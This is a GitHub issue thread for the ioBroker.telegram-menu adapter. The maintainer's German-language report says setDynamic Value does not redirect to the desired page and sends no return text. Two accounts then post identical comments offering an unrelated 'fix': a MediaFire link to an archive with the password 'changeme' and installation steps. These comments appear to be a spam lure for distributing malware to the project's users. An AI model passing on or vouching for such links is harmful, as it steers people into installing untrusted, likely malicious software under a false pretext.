### ISSUE TITLE
Error in setDynamic Value

### ISSUE THREAD

**Issue by MiRo1310** [MiRo1310/ioBroker.telegram-menu#176]
![image](https://github.com/user-attachments/assets/ac00f900-a654-4389-a34f-37e4eb4c0240)

- Es wird nicht auf eine gewünschte Seite weiter geleitet
- Es wird kein Rückgabetext gesendet
- Doku anpassen

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
